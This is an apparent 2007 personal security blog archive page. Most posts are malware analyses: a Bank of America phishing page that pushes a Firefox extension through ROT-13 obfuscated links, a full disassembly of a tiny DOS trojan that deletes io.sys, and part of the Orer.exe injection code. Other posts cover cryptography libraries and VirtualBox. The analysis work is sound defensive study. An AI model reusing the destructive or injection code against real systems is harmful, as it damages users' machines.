[MALWARE] Bank Of America Virus!!

September 29, 2007

Warning: This post contains Malware, pay attention!!!!

The site hxxp://bankofamerica.ulmb.com/do.php?cmd=SignIn (spreaded with Spam Mail) contains a Malware, not explicitly linked.
I’ve used Malzilla to inspect URL content, a suspicious message appears:

Browser Update Required!

This web site uses functions which is not compatible with your current browser version To update your browser please install the requiredupdate to view this page.

Very strange, that no checks about the compatibility are performed before this message, so let’s inspect further..

<script type=”text/javascript”>

var myf_1 = 60;

var myf_10 = “1″;
var myf_11 = “82SSN573-38NN-482N-99NQ-91S697O91631″;
var myf_12 = “uggc://jjj.svyr2lbh.arg/nccyrg.pno”;

These two strings seems to be Obfuscated Links , let’s see the rest of the Evil Code, have a function dc(str), that decodes with an easy algorithm (ROT-13 Encryption) an encrypted string, next we have a function install_ff_result() and function install_ff_ext() that installates FireFox Extension.

Now the extension file is taken from a supect source, file2you, a bit poor for Banks of America, you don’t think? :)

So let’s see what are the obfuscated links:


hxxp://www.file2you.net/{censored against lamah}.cab

and

hxxp://www.file2you.net/{censored or lamah}.xpi

Both these links contains the same Malware.

In the next post, i’ll report what this Malware FF Extension does..

See you to the next post :)


KMDF’s NTSTATUS Return Values

September 29, 2007

Frequently happens that, KMDF Functions returns strange status values, that can’t be founded into NtStatus.h, this causes to Newbie KMDF Coders some confusion, the solution is easy, just take a look at \inc\wdf\kmdf\10\wdfstatus.h ;)

See you to the next post :)


[Malware] Trojan.DOS.DelIosys.b

September 28, 2007

This morning I’ve received between the classic Spam, a little attachment that contains an old Virus, so I’ve dissected It:

seg000:0100 mov ax, 4301h
seg000:0103 mov dx, 114h
seg000:0106 mov cx, 6
seg000:0109 int 21h ; DOS – 2+ – SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113
seg000:010D mov ah, 41h
seg000:010F int 21h ; DOS – 2+ – DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2
seg000:0113 retn
seg000:0113 start endp

The file is a little COM executable for MS-DOS, which uses two elementary interrupt’s calls, one for Attributes Settings and another for File Deletion (ASCIZ pathname in this case points to io.sys System’s file).

This malware, is identified by the major antivirus as Trojan.DOS.DelIosys.b

File Size: 30 Bytes

MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f

SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835

It’s incredible how old Viruses are still around the web!

See you to the next post :)


BouncyCastle Experiment Good Results #2

September 27, 2007

Good news from my BouncyCastle Crypto Libs.

I’ve just finished the MultiHasher Experiment, cause a lack of documentation I wasn’t sure of I/O functions but Peter Dettman clarified me something:

for the Byte encoding of the string, could be used the Classical Encoder class of System.ComponentModel, in this way:

InputBuffer = Encod.GetBytes(YourString);

Is used UTF8Encoding instead of ASCII Encoding:

textBox1.Text = Encod.GetString(Hex.Encode(outBuffer));

See you to the next post :)


[VirtualBox] Xp Installation Problems

September 26, 2007

Today I’ve installed an Xp VM powered by VirtualBox, but initially I’ve encountered a problem that blocked the installation.

As indicated by VBox i’ve choised 192 MB for VM’s Memory, but at the step of NTFS Formattation VBox shuts down with the following error:

HostMemoryLow

So I setted the memory at 125 MB and installation worked fine.

Remember don’t believe to the Indicated Memory Usage ;)

See you to the next post :)


First Experiments with BouncyCastle CryptoLib

September 25, 2007

In these day I’m experimentig a promising library which implements many Crypto Algorithms, called BouncyCastle (which is for .NET, and I’m coding in C#).

Library, seems to be complete and to have good implementations of Common Algorithms, EllipticCurveCryptography, Certifications, OpenPGP, OpenSSL.

A part a little leak of performances in ECIES algorithm, seems to work great.

The big problem is that Hex Conversion functions have some problem, for example Hex.Decode() , fails when the string passed have an odd lenght.

To dayI’ve sent an email to the coders, hope in a fast reply, if i discover how to solve also other minor problems (actually no time to mention all) i’ll post here the fixed piece of code ;)

See you to the next post :)


Attacking MultiCore CPUs

September 25, 2007

Recently was published an intersting Security Flaw and realtu  for MultiCore CPUs, here you can find a generic Overview, and here a more Detailed descryption of the Vulnerability :)

See you to the next post! :)


News & Links

September 22, 2007

In these days I’ve searched informations about USB C# Classes and Libraries, because Low Level I/O informations, into .NET is a bit difficult to find, here there are some links that could interest you ;)

SharpUSBLib

USBWirelessSecurity

DeviceIOControl & USB Using Managed C++ and C#

USB HID

See you to the next post :)


Orer.exe Reverse Code Engineering #2

September 19, 2007

After many time from the second promised part, here the continuation of Orer’s Reverse Code Engineering.

At the Entry Point we have the injected, malicious code, in form of call, so let’s study this call:

010460D0        CALL orer.010460D5 ; Malicious Code Entry Point
010460D5        POP EBX
010460D6        SUB EBX,401005
...
010460EA       CALL orer.010461F7 ;Scan for 'MZ'
010460EF       MOV EBP,EAX ; In EAX the Executable memory address
010460F1       POP EAX
010460F2       PUSH EBP ;Put Exec address in stack
010460F3       PUSH 4014BD ; Empty Location
010460F8       PUSH 402711 ; Empty Location2
...
0104610B      PUSH EAX
0104610C      PUSH A5171D00
01046111      PUSH EBP      ;Exec Address
01046112      CALL orer.0104618D
01046117      OR EAX,EAX
01046119      JE orer.0104658D ;Go_Out
0104611F      PUSH 40
0104611F      PUSH 40
01046121      PUSH 1000
01046126      PUSH 1D95
0104612B      PUSH 0
0104612D      CALL EAX ;VirtualAlloc
01046137       MOV EDI,EAX
01046139       LEA EDX,DWORD PTR DS:[EBX+40114C] ;0104621c (ORER)
...
01046143      ADD EDX,1000
01046149      CALL orer.010461F7  ;Search_Loaded_Exec
0104614E     ADD EAX,DWORD PTR DS:[EAX+3C] ;(01000000 - is Explorer)
...
01046183     POP EBX
01046184     POP EAX
01046185     LEA ECX,DWORD PTR DS:[EAX+234]
0104618B    JMP ECX ;007E0234

Last Jump redirects code execution to Orer’s Main Thread, so here the Main Thread Code:

0840239      POP EDX   ; 00840239 (Not every time the same address, obviously)
0084023A    SUB EDX,401239
00840240     XCHG EDX,EBX
00840242     PUSHAD
00840243     LEA ESI,DWORD PTR DS:[EBX+402741]
00840249     LEA EDI,DWORD PTR DS:[EBX+402875]
...
0084026C    PUSH EAX
0084026D    PUSH EBP
0084026E    CALL 008400BD ;Obtain Functions
00840273    STOS DWORD PTR ES:[EDI] ;Function's Address is contained in EAX
00840274    CMP DWORD PTR DS:[ESI],0
00840277    LOOPDNE SHORT 0084024F
00840279    POPAD
0084027A   OR EDX,EDX
0084027C  JE SHORT 0084029A

The most intersing thing in this piece of code, is the IT Building, here the Imported Functions:

CreateFileA,GetFileAttrib, SetFileAttrib, MapViewOfFile, UnMapViewOfFile, GetFileSize, SetFileTime, GetFileType, CloseHandle, GetProcAddress, VirtualFree, GetTickCount, GetWindowDirectory, GetModuleFileName, GetTempPAthW, DeleteFileW/A, MoveFile,CopyFile, WriteFile,VirtualAlloc, VirtualProtect,Sleep, GetDriveType, CreateProcessW, WinExec, GetCurrentProcess, CreateToolHelp32Snapshot, Process32First, Process32Next,OpenProcess, SetFilePointer

Third part will be completed in a few days :)


Unified C# 3.0 Specification

September 19, 2007

The authoritative C# 3.0 Specification was written by the people who created and implemented the C# language. This 500 plus page document is now available for Download

See you to the next post :)


Follow

Get every new post delivered to your Inbox.